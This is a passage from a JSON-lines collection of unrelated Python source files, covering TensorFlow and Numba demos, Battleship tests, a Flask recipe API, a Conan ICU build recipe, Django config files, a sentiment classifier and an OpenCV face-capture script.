tf.Variable(weights.initialized_value(), name=\"w20\")\n# Create another variable with twice the value of 'weights'\nw_twice = tf.Variable(weights.initialized_value() * 2.0, name=\"w_twice0\")\n\ninit_op=tf.initialize_all_variables()\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n\tsess.run(init_op)\n\t#sess.run(tf.initialize_variables([w2,w_twice]))\n\t#sess.run(tf.initialize_variables([biases]))\n\t\t\n\tprint(sess.run(weights))\n\tprint(sess.run(biases))\n\tprint(sess.run(w2))\n\tprint(sess.run(w_twice))\n\t\n\tsave_path=saver.save(sess,\"/tmp/model.csv\")\n\tprint(\"MOdel saved in file: %s\"% save_path)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"474394369","text":"import unittest\nfrom Ship import Ship\n\nclass TestShip(unittest.TestCase):\n\n def test_battleship_coords(self):\n ship = Ship(\"battleship\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1), (0, 2), (0, 3)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"battleship\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0), (2, 0), (3, 0)]\n self.assertEqual(ship_body, ship.get_body)\n\n def test_cruiser_coords(self):\n ship = Ship(\"cruiser\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1), (0, 2)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"cruiser\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0), (2, 0)]\n self.assertEqual(ship_body, ship.get_body)\n \n def test_destroyer_coords(self):\n ship = Ship(\"destroyer\", \"H\", 1, \"A\")\n ship_body = [(0, 0), (0, 1)]\n self.assertEqual(ship_body, ship.get_body)\n\n ship = Ship(\"destroyer\", \"V\", 1, \"A\")\n ship_body = [(0, 0), (1, 0)]\n self.assertEqual(ship_body, ship.get_body)\n \n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"TextbaseGames/Battleship/test_Ship.py","file_name":"test_Ship.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"583090172","text":"#!/usr/bin/python\nimport random\nimport os\n\n\nclass SloppyJoe(object):\n def __init__(self):\n ROOT = os.path.dirname(os.path.abspath(__file__))\n\n self.adjectives = [x.rstrip() for x in open(\"%s/%s\" % (ROOT, \"words.txt\")).readlines()]\n self.names = [x.rstrip() for x in open(\"%s/%s\" % (ROOT, \"names.txt\")).readlines()]\n\n def get_adjective(self):\n return random.sample(self.adjectives, 1)[0]\n\n def get_common_name(self, names=[]):\n if len(names) == 0:\n names = self.names\n\n return random.sample(names, 1)[0]\n\n def generate_name(self, alliterate=False):\n \"\"\"\n Returns a name that is made from a list of synonyms for sloppy and\n common names. If ``alliterate`` is True only names where the adjective\n and the common name have the same first character will be returned.\n \"\"\"\n names = self.names\n adjective = self.get_adjective()\n\n if alliterate:\n names = []\n\n while len(names) == 0:\n names = filter(lambda name: name[0] == adjective[0], self.names)\n\n # If there aren't any names, get a new adjective and try again.\n if len(names) == 0:\n adjective = self.get_adjective()\n\n name = self.get_common_name(names)\n return \"%s %s\" % (adjective, name)\n","sub_path":"chrispickett_me/projects/sloppyjoe/sloppyjoe.py","file_name":"sloppyjoe.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"460125165","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, session, url_for, make_response, Response\n)\nimport json\nfrom datetime import datetime\nfrom lastMeal.models.user import User\nfrom lastMeal.models.ingredient import Ingredient\nfrom bson.objectid import ObjectId\n\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nimport datetime as dt\nimport requests\n\n# Blueprint for connection to main process\nbp = Blueprint('recipes', __name__, url_prefix='/v1/recipes')\n\napi_key = ''\n\n# Basic Recipe Request Based on Ingredients\n@bp.route('', methods=['POST'])\n#@jwt_required()\ndef fetch_recipes():\n request_data = request.json\n\n ingredientList = request_data['ingredients']\n\n if ingredientList is None:\n return ({\"error\": \"no ingredients were passed\"}, 400)\n\n try:\n body = {\n 'ignorePantry': True,\n 'ingredients': ingredientList,\n 'limitLicense': False,\n 'number': 10,\n 'ranking': 1,\n 'apiKey': api_key\n }\n\n endpoint = \"https://api.spoonacular.com/recipes/findByIngredients\"\n\n headers={\n \"X-Mashape-Key\": api_key,\n \"X-Mashape-Host\": \"mashape host\"\n }\n \n r = requests.get(endpoint, params=body, headers=headers)\n recipe_results = r.json()\n\n print(\"TESTING SPOONACULAR RECIPE API\")\n print(recipe_results)\n\n new_data = {}\n\n new_data['recipe_data'] = recipe_results\n return ({'recipe_data': new_data}, 200)\n \n except Exception as e:\n print(e)\n return ({\"error\": \"Error in recipe fetch request\"}, 400)\n\n@bp.route('/', methods=['GET'])\n# @jwt_required()\ndef fetch_recipe_info(recipe_id):\n\n if recipe_id is None:\n return ({\"error\": \"No recipe ID was passed\"}, 400)\n \n try:\n endpoint = \"https://api.spoonacular.com/recipes/\" + recipe_id + \"/information\"\n\n body = {\n 'apiKey': api_key\n }\n\n headers={\n \"X-Mashape-Key\": api_key,\n \"X-Mashape-Host\": \"mashape host\"\n }\n\n r = requests.get(endpoint, params=body, headers=headers)\n recipe_info_results = r.json()\n\n new_data = {}\n\n new_data['recipe_info'] = recipe_info_results\n return ({'recipe_id': recipe_id, 'recipe_data': new_data}, 200)\n\n except Exception as e:\n print(e)\n return ({\"error: Error in recipe info fetch request\"}, 400)\n\n@bp.route('save/', methods=['GET'])\n# @jwt_required()\ndef user_favorite_recipe(recipe_id):\n pass \n # placeholder for user-favorited recipes; make sure that data is parsed before saving, and that the recipe ID is saved\n # Upon clicking on the UI, we can redirect to the same recipeInfo page that we do for the pantry/recipe page\n\n\n# Space here for any additional parsing we want to do in the backend\n","sub_path":"lastMeal/api/v1/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"121864953","text":"# [Note] http://numba.pydata.org/\n# [Note] http://numba.pydata.org/numba-doc/0.35.0/index.html\n# [Note] conda update numba\n\n\nimport numba\nfrom numba import jit, float32, int32, void, cuda\nfrom numpy import arange\nfrom timeit import default_timer as timer\n\nprint(\"Numba Version\", numba.__version__)\n\n# jit decorator tells Numba to compile this function.\n# The argument types will be inferred by Numba when function is called.\n@jit\ndef jit_sum_1(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\n@jit(float32(int32[:]))\ndef jit_sum_2(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\ndef sum(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i,j]\n return result\n\n\n# @cuda.jit(void(int32[:]))\n# def cuda_jit_sum(arr):\n# M, N = arr.shape\n# result = 0.0\n# for i in range(M):\n# for j in range(N):\n# result += arr[i,j]\n# return result\n\n\na = arange(900000000).reshape(30000, 30000)\nprint(a)\n\nprint()\n\ns = timer()\nresult = jit_sum_1(a)\ne = timer()\nprint(\"JIT_SUM_1: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\ns = timer()\nresult = jit_sum_2(a)\ne = timer()\nprint(\"JIT_SUM_2: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\ns = timer()\nresult = sum(a)\ne = timer()\nprint(\"NORMAL_SUM: {:7.6f} ms\".format((e - s) * 1000))\nprint(result)\n\nprint()\n\n# s = timer()\n# result = cuda_jit_sum(a)\n# e = timer()\n# print(\"{:7.6f} ms\".format((e - s) * 1000))\n# print(result)","sub_path":"1731061014_jinseojeong/numba_test/numba_test.py","file_name":"numba_test.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573460268","text":"import tensorflow as tf\nfrom tensorflow.python.platform import gfile\nimport INCEPTION_V3_demo\nimport os.path\nimport random\nimport numpy as np\nimport glob\n\nBOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'\n\n#图像输入张量所对应的名称。\nJPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'\n\n#下载的谷歌训练好的Inception-v3模型文件目录。\n\n\nMODEL_FILE = 'graph.pb'\n\n\n\ndef create_image_test_lists():\n INPUT_DATA = 'test'\n file_list = []\n extensions = ['jpg', 'jpeg', '#JPG', '#JPEG']\n for extension in extensions:\n file_glob = os.path.join(INPUT_DATA, '*.' + extension)\n file_list.extend(glob.glob(file_glob))\n return file_list \n\nimage_path = create_image_test_lists()[0]\n#获取图片内容。\nimage_data = gfile.GFile(image_path, 'rb').read()\n\ndef get_bottleneck_values():\n #load graph\n with gfile.GFile(\"path/to/model/classify_image_graph_def.pb\",'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n #加载读取的Inception-v3模型,并返回数据输入所对应的张量以及计算瓶颈层结果所对应\n #的张量。\n bottleneck_tensor, jpeg_data_tensor = tf.import_graph_def(graph_def,\n return_elements=[BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME])\n\n with tf.Session() as sess:\n bottleneck_values = sess.run(bottleneck_tensor, {jpeg_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n\n return bottleneck_values\n \ndef main(self):\n train_bottlenecks = get_bottleneck_values()\n #load graph\n saver = tf.train.import_meta_graph(\"path/to/save/model.ckpt.meta\")\n\n with tf.Session() as sess:\n saver.restore(sess, \"path/to/save/model.ckpt\")\n train_bottlenecks = np.reshape(train_bottlenecks, (1,2048))\n \n c1 = sess.run(\"final_training_ops/Softmax:0\",feed_dict={\"BottleneckInputPlaceholder:0\":train_bottlenecks})\n print(c1)\n \n\nif __name__ == '__main__':\n tf.app.run()\n\n","sub_path":"Inception_V3/test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643862453","text":"def metodo_diferencias_divididas():\n # Polinomio interpolación\n # Diferencias diferencia dividida\n # Tarea: Verificar tamaño de vectores,\n # verificar puntos equidistantes en x\n import numpy as np\n import sympy as sym\n import matplotlib.pyplot as plt\n\n # INGRESO , Datos de prueba\n #xi = np.array([3.2, 3.8, 4.2, 4.5])\n #fi = np.array([5.12, 6.42, 7.25, 6.85])\n xi_aux = []\n fi_aux = []\n n_1 = 0\n while(True):\n try:\n n_1 = int(input(\"Cantidad de n >> \"))\n break\n except Exception as e:\n pass\n\n for _ in range(n_1):\n aux = float(input(\"x_{} >> \".format(_)))\n xi_aux.append(aux)\n\n for _ in range(n_1):\n aux = float(input(\"f_{} >> \".format(_)))\n fi_aux.append(aux)\n\n xi = np.array(xi_aux)\n fi = np.array(fi_aux)\n # PROCEDIMIENTO\n\n # Tabla de Diferencias divididas\n titulo = ['i','xi','fi']\n n = len(xi)\n ki = np.arange(0,n,1)\n tabla = np.concatenate(([ki],[xi],[fi]),axis=0)\n tabla = np.transpose(tabla)\n # diferencias \n dfinita = np.zeros(shape=(n,n),dtype=float)\n tabla = np.concatenate((tabla,dfinita), axis=1)\n # Calcula tabla, inicia en columna 3\n [n,m] = np.shape(tabla)\n diagonal = n-1\n j = 3\n while (j < m):\n # Añade título para cada columna\n titulo.append('df'+str(j-2))\n # cada fila de columna\n paso=j-2\n i = 0\n while (i < diagonal):\n numerador = tabla[i+1,j-1]-tabla[i,j-1]\n denominador = xi[i+paso]- xi[i]\n tabla[i,j] = numerador/denominador\n i = i+1\n diagonal = diagonal - 1\n j = j+1\n\n # POLINOMIO con diferencias divididas\n # caso: puntos equidistantes en eje x\n h = xi[1] - xi[0]\n dfinita = tabla[0,3:]\n n = len(dfinita)\n # expresión del polinomio con Sympy\n x = sym.Symbol('x')\n polinomio = fi[0]\n for j in range(1,n,1):\n factor = dfinita[j-1]\n termino = 1\n for k in range(0,j,1):\n termino = termino*(x-xi[k])\n polinomio = polinomio + termino*factor\n # simplifica multiplicando entre (x-xi)\n polisimple = polinomio.expand()\n\n # polinomio para evaluacion numérica\n px = sym.lambdify(x,polisimple)\n\n # Puntos para la gráfica\n muestras = 101\n a = np.min(xi)\n b = np.max(xi)\n pxi = np.linspace(a,b,muestras)\n pfi = px(pxi)\n\n # SALIDA\n np.set_printoptions(precision=3)\n print('Tabla Diferencia dividida')\n print([titulo])\n print(tabla)\n print('dividida: ')\n print(dfinita)\n print('polinomio: ')\n print(polinomio)\n print('polinomio simplificado: ' )\n print(polisimple)\n\n # Gráfica\n plt.plot(xi,fi,'o', label = 'Puntos')\n ##for i in range(0,n,1):\n ## plt.axvline(xi[i],ls='--', color='yellow')\n plt.plot(pxi,pfi, label = 'Polinomio')\n plt.legend()\n plt.xlabel('xi')\n plt.ylabel('fi')\n plt.title('diferencia dividida por newton')\n plt.show()\n#metodo_diferencias_divididas()","sub_path":"Diferencias_divididas.py","file_name":"Diferencias_divididas.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"78571426","text":"'''\r\nPython 3.6.0\r\n\r\nJenny Tso\r\nGUI Drill\r\n\r\n'''\r\n\r\nfrom tkinter import *\r\nimport tkinter as ttk\r\n\r\nimport fileTransfer_gui\r\nimport fileTransfer_functions\r\n\r\nclass ParentFrame(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n self.master = master\r\n self.master.minsize(480, 420)\r\n self.master.maxsize(480, 420)\r\n #self.master.resizeable(False, False)\r\n #fileTransfer_functions.center_window(self, 480, 480)\r\n self.master.title(\"Transfer New or Modified Files\")\r\n self.master.configure(bg=\"#F0F0F0\")\r\n #self.master.protocol(\"WM_DELETE_WINDOW\", lambda: phonebook_func.ask_quit(self))\r\n fileTransfer_gui.window(self)\r\n\r\nif __name__ == \"__main__\":\r\n root = ttk.Tk()\r\n Application = ParentFrame(root)\r\n root.mainloop()\r\n \r\n","sub_path":"fileTransfer_main.py","file_name":"fileTransfer_main.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442241088","text":"import os\nimport glob\nimport platform\nimport shutil\nfrom conans import ConanFile, tools, AutoToolsBuildEnvironment\n\n\nclass ICUBase(ConanFile):\n version = \"64.2\"\n homepage = \"http://site.icu-project.org\"\n license = \"ICU\"\n description = \"ICU is a mature, widely used set of C/C++ and Java libraries \" \\\n \"providing Unicode and Globalization support for software applications.\"\n url = \"https://github.com/bincrafters/conan-icu\"\n topics = (\"conan\", \"icu\", \"icu4c\", \"i see you\", \"unicode\")\n exports = [\"icu_base.py\"]\n # exports_sources = [\"patches/*.patch\"]\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n _env_build = None\n short_paths = True\n\n @property\n def _the_os(self):\n return self.settings.get_safe(\"os\") or self.settings.get_safe(\"os_build\")\n\n @property\n def _the_arch(self):\n return self.settings.get_safe(\"arch\") or self.settings.get_safe(\"arch_build\")\n\n @property\n def _is_msvc(self):\n return self.settings.compiler == \"Visual Studio\"\n\n @property\n def _is_mingw(self):\n return self._the_os == \"Windows\" and self.settings.compiler == \"gcc\"\n\n def build_requirements(self):\n if self._the_os == \"Windows\":\n #self.build_requires(\"cygwin_installer/2.9.0@bincrafters/stable\")\n self.build_requires(\"msys2_installer/20161025@bincrafters/stable\")\n\n def source(self):\n version = self.version.replace('.', '-')\n version_with_underscore = self.version.replace('.', '_')\n source_url = \"https://github.com/unicode-org/icu/releases/download/release-{0}/icu4c-{1}-src.tgz\".format(version, version_with_underscore)\n self.output.info(\"Downloading {0} ...\".format(source_url))\n tools.get(source_url,\n sha256=\"627d5d8478e6d96fc8c90fed4851239079a561a6a8b9e48b0892f24e82d31d6c\")\n os.rename(\"icu\", self._source_subfolder)\n\n def _replace_pythonpath(self):\n if self._is_msvc:\n srcdir = os.path.join(self.build_folder, self._source_subfolder, \"source\")\n configure = os.path.join(self._source_subfolder, \"source\", \"configure\")\n tools.replace_in_file(configure,\n 'PYTHONPATH=\"$srcdir/data\"',\n 'PYTHONPATH=\"%s\\\\data\"' % srcdir)\n tools.replace_in_file(configure,\n 'PYTHONPATH=\"$srcdir/test/testdata:$srcdir/data\"',\n 'PYTHONPATH=\"%s\\\\test\\\\testdata;%s\\\\data\"' % (srcdir, srcdir))\n\n def _workaround_icu_20545(self):\n if tools.os_info.is_windows:\n # https://unicode-org.atlassian.net/projects/ICU/issues/ICU-20545\n srcdir = os.path.join(self.build_folder, self._source_subfolder, \"source\")\n makeconv_cpp = os.path.join(srcdir, \"tools\", \"makeconv\", \"makeconv.cpp\")\n tools.replace_in_file(makeconv_cpp,\n \"pathBuf.appendPathPart(arg, localError);\",\n \"pathBuf.append('/', localError); pathBuf.append(arg, localError);\")\n\n def build(self):\n for filename in glob.glob(\"patches/*.patch\"):\n self.output.info('applying patch \"%s\"' % filename)\n tools.patch(base_path=self._source_subfolder, patch_file=filename)\n\n if self._is_msvc:\n run_configure_icu_file = os.path.join(self._source_subfolder, 'source', 'runConfigureICU')\n\n flags = \"-%s\" % self.settings.compiler.runtime\n if self.settings.get_safe(\"build_type\") == 'Debug':\n flags += \" -FS\"\n tools.replace_in_file(run_configure_icu_file, \"-MDd\", flags)\n tools.replace_in_file(run_configure_icu_file, \"-MD\", flags)\n\n self._replace_pythonpath() # ICU 64.1\n self._workaround_icu_20545()\n\n self._env_build = AutoToolsBuildEnvironment(self)\n if not self.options.get_safe(\"shared\"):\n self._env_build.defines.append(\"U_STATIC_IMPLEMENTATION\")\n if tools.is_apple_os(self._the_os):\n self._env_build.defines.append(\"_DARWIN_C_SOURCE\")\n if self.settings.get_safe(\"os.version\"):\n self._env_build.flags.append(tools.apple_deployment_target_flag(self._the_os,\n self.settings.os.version))\n\n build_dir = os.path.join(self.build_folder, self._source_subfolder, 'build')\n os.mkdir(build_dir)\n\n with tools.vcvars(self.settings) if self._is_msvc else tools.no_op():\n with tools.environment_append(self._env_build.vars):\n with tools.chdir(build_dir):\n # workaround for https://unicode-org.atlassian.net/browse/ICU-20531\n os.makedirs(os.path.join(\"data\", \"out\", \"tmp\"))\n\n self.run(self._build_config_cmd, win_bash=tools.os_info.is_windows)\n if self.options.get_safe(\"silent\"):\n silent = '--silent' if self.options.silent else 'VERBOSE=1'\n else:\n silent = '--silent'\n command = \"make {silent} -j {cpu_count}\".format(silent=silent,\n cpu_count=tools.cpu_count())\n self.run(command, win_bash=tools.os_info.is_windows)\n if self.options.get_safe(\"with_unit_tests\"):\n command = \"make {silent} check\".format(silent=silent)\n self.run(command, win_bash=tools.os_info.is_windows)\n command = \"make {silent} install\".format(silent=silent)\n self.run(command, win_bash=tools.os_info.is_windows)\n\n self._install_name_tool()\n\n def package(self):\n if self._is_msvc:\n for dll in glob.glob( os.path.join( self.package_folder, 'lib', '*.dll' ) ):\n shutil.move( dll, os.path.join( self.package_folder, 'bin' ) )\n\n self.copy(\"LICENSE\", dst=\"licenses\", src=os.path.join(self.source_folder, self._source_subfolder))\n\n @staticmethod\n def detected_os():\n if tools.OSInfo().is_macos:\n return \"Macos\"\n if tools.OSInfo().is_windows:\n return \"Windows\"\n return platform.system()\n\n @property\n def cross_building(self):\n if tools.cross_building(self.settings):\n if self._the_os == self.detected_os():\n if self._the_arch == \"x86\" and tools.detected_architecture() == \"x86_64\":\n return False\n return True\n return False\n\n @property\n def build_config_args(self):\n prefix = self.package_folder.replace('\\\\', '/')\n platform = {(\"Windows\", \"Visual Studio\"): \"Cygwin/MSVC\",\n (\"Windows\", \"gcc\"): \"MinGW\",\n (\"AIX\", \"gcc\"): \"AIX/GCC\",\n (\"AIX\", \"xlc\"): \"AIX\",\n (\"SunOS\", \"gcc\"): \"Solaris/GCC\",\n (\"Linux\", \"gcc\"): \"Linux/gcc\",\n (\"Linux\", \"clang\"): \"Linux\",\n (\"Macos\", \"gcc\"): \"MacOSX\",\n (\"Macos\", \"clang\"): \"MacOSX\",\n (\"Macos\", \"apple-clang\"): \"MacOSX\"}.get((str(self._the_os),\n str(self.settings.compiler)))\n arch64 = ['x86_64', 'sparcv9', 'ppc64']\n bits = \"64\" if self._the_arch in arch64 else \"32\"\n args = [platform,\n \"--prefix={0}\".format(prefix),\n \"--with-library-bits={0}\".format(bits),\n \"--disable-samples\",\n \"--disable-layout\",\n \"--disable-layoutex\"]\n\n if self.cross_building:\n if self._env_build.build:\n args.append(\"--build=%s\" % self._env_build.build)\n if self._env_build.host:\n args.append(\"--host=%s\" % self._env_build.host)\n if self._env_build.target:\n args.append(\"--target=%s\" % self._env_build.target)\n\n if self.options.get_safe(\"data_packaging\"):\n args.append(\"--with-data-packaging={0}\".format(self.options.data_packaging))\n else:\n args.append(\"--with-data-packaging=static\")\n\n if self._is_mingw:\n mingw_chost = 'i686-w64-mingw32' if self._the_arch == 'x86' else 'x86_64-w64-mingw32'\n args.extend([\"--build={0}\".format(mingw_chost),\n \"--host={0}\".format(mingw_chost)])\n\n if self.settings.get_safe(\"build_type\") == \"Debug\":\n args.extend([\"--disable-release\", \"--enable-debug\"])\n if self.options.get_safe(\"shared\"):\n args.extend([\"--disable-static\", \"--enable-shared\"])\n else:\n args.extend([\"--enable-static\", \"--disable-shared\"])\n if not self.options.get_safe(\"with_unit_tests\"):\n args.append('--disable-tests')\n return args\n\n @property\n def _build_config_cmd(self):\n return \"../source/runConfigureICU %s\" % \" \".join(self.build_config_args)\n\n def _install_name_tool(self):\n if tools.is_apple_os(self._the_os):\n with tools.chdir(os.path.join(self.package_folder, 'lib')):\n for dylib in glob.glob('*icu*.{0}.dylib'.format(self.version)):\n command = 'install_name_tool -id {0} {1}'.format(os.path.basename(dylib), dylib)\n self.output.info(command)\n self.run(command)\n","sub_path":"icu_base.py","file_name":"icu_base.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16302025","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\nimport codecs\nimport glob\nimport os\n\nhome = os.getcwd()\n\ndef get_text_list(path):\n list_id = []\n os.chdir(path)\n for file in glob.glob('*.txt'):\n list_id.append(file)\n return list_id\n\ndef get_train_text():\n pos_list = get_text_list('data_train/train/pos')\n os.chdir(home)\n pos_text = []\n for item in pos_list:\n f = codecs.open(''.join(['data_train/train/pos/', item]), 'r', 'utf-8')\n pos_text.append(f.read().replace('\\n', ' '))\n f.close()\n neg_list = get_text_list('data_train/train/neg')\n os.chdir(home)\n neg_text = []\n for item in neg_list:\n f = codecs.open(''.join(['data_train/train/neg/', item]), 'r', 'utf-8')\n neg_text.append(f.read().replace('\\n', ' '))\n f.close()\n del pos_list, neg_list\n return pos_text, neg_text\n\ndef get_test_text():\n pos_list = get_text_list('data_train/test/pos')\n os.chdir(home)\n pos_text = []\n for item in pos_list:\n f = codecs.open(''.join(['data_train/test/pos/', item]), 'r', 'utf-8')\n pos_text.append(f.read().replace('\\n', ' '))\n f.close()\n neg_list = get_text_list('data_train/test/neg')\n os.chdir(home)\n neg_text = []\n for item in neg_list: \n f = codecs.open(''.join(['data_train/test/neg/', item]), 'r', 'utf-8')\n neg_text.append(f.read().replace('\\n', ' '))\n f.close()\n del pos_list, neg_list\n return pos_text, neg_text\n\npos_text, neg_text = get_train_text()\ndata_train = pos_text + neg_text\nos.chdir(home)\npos_text, neg_text = get_test_text()\ndata_test = pos_text + neg_text\nos.chdir(home)\ndel pos_text, neg_text\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ntfidf_vectorizer = TfidfVectorizer()\nX_train = tfidf_vectorizer.fit_transform(data_train)\nX_test = tfidf_vectorizer.transform(data_test)\ndel data_train, data_test\npickle.dump(X_train, open('train','wb'))\npickle.dump(X_test, open('test','wb'))\ny_train = np.append(np.ones(15000), np.zeros(15000))\n#y_train = y_train.reshape((-1, 1))\ny_test = np.append(np.ones(5000), np.zeros(5000))\n\n#from sklearn.neural_network import MLPClassifier\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import confusion_matrix\n#\n#clf = MLPClassifier(hidden_layer_sizes=(100,50,50), alpha=1e-5, max_iter=40,\n# verbose=10, random_state=1, tol=0.000000001)\n#clf.fit(X_train, y_train)\n#y_pred = clf.predict(X_test)\n#print(accuracy_score(y_test, y_pred))\n#cm = confusion_matrix(y_test, y_pred)\n#print(cm)\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom xgboost import XGBClassifier\n\nnames = ['Decision Tree', 'Random Forest', 'Gradient Boosting', 'XGBoost']\nmodels = [\n DecisionTreeClassifier(),\n RandomForestClassifier(n_estimators=100),\n GradientBoostingClassifier(n_estimators=100,\n validation_fraction=0.2,\n n_iter_no_change=5, tol=0.00001),\n XGBClassifier()]\naccuracy = []\nfor name, clf in zip(names, models):\n clf.fit(X_train, y_train)\n score = clf.score(X_test, y_test)\n accuracy.append(score)\n print('{} has accuracy {:.4f}'.format(name, score))\n\n#sns.heatmap(cm, center=True)\n#plt.show()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155773239","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lilly', '0002_study_category'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='conditions',\n name='condition_term_rev',\n field=models.CharField(help_text=b'condition term words reversed and comma removed to match Study conditions', max_length=1000, null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='conditions',\n name='condition_term',\n field=models.CharField(max_length=1000),\n preserve_default=True,\n ),\n ]\n","sub_path":"studies/lilly/migrations/0003_auto_20150110_1614.py","file_name":"0003_auto_20150110_1614.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113321135","text":"from django.urls import path\n\nfrom .views.base import IndexView, get_data_for_chart\nfrom .views.monitoring import MonitoringLhkasnView, get_table_lhkasn, MonitoringLhkpnView, get_table_lhkpn\nfrom .views.verifikator import BebanVerifikatorView, get_table_verifikator\n\napp_name = 'dashboardApp'\n\nurlpatterns = [\n path('ajax/get_data_for_chart/', get_data_for_chart, name='getDataChartUrl'),\n path('ajax/get_table_verifikator/', get_table_verifikator, name='getTableVerifikatorUrl'),\n path('ajax/get_table_lhkasn/', get_table_lhkasn, name='getTableLhkasnUrl'),\n path('ajax/get_table_lhkpn/', get_table_lhkpn, name='getTableLhkpnUrl'),\n\n path('beban-verifikator/', BebanVerifikatorView.as_view(), name='bebanVerifikatorUrl'),\n path('monitoring-lhkasn/', MonitoringLhkasnView.as_view(), name='monitoringLhkasnUrl'),\n path('monitoring-lhkpn/', MonitoringLhkpnView.as_view(), name='monitoringLhkpnUrl'),\n path('', IndexView.as_view(), name='indexUrl'),\n]\n","sub_path":"simpanan_berharga_v2/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270057716","text":"import cv2\nfrom pathlib import Path\n\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nvc = cv2.VideoCapture(0)\n\nprint(\"Enter the id and name of the person:\")\nuserId = input()\nuserName = input()\n\ncount = 1\n\ndef saveImage(img, userName, userId, imgId):\n Path(\"dataset/{}\".format(userName)).mkdir(parents=True, exist_ok=True)\n cv2.imwrite(\"dataset/{}/{}_{}.jpg\".format(userName, userId, imgId), img)\n\nwhile True:\n\n _, img = vc.read()\n\n originalImg = img\n\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(gray_img,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(50, 50))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n coords = [x, y, w, h]\n\n imS = cv2.resize(img, (960, 540))\n cv2.imshow(\"identified image\", imS)\n\n key = cv2.waitKey(1) & 0xff\n\n if key == ord('s'):\n if count <= 100:\n roi_img = originalImg[coords[1]:coords[1]+coords[3], coords[0]:coords[0]+coords[2]]\n saveImage(roi_img, userName, userId, count)\n count += 1\n else:\n break\n elif key == ord('q'):\n break\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\nvc.release()\ncv2.destroyAllWindows()\n","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529224828","text":"import json\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.utils.serializer_helpers import ReturnList\n\nclass RatebumJSONRenderer(JSONRenderer):\n charset = 'utf-8'\n object_label = 'object'\n\n def render(self, data, media_type=None, renderer_context=None):\n # If the view throws an error (such as the user can't be authenticated)\n # `data` will contain an `errors` key. \n # the default JSONRenderer will 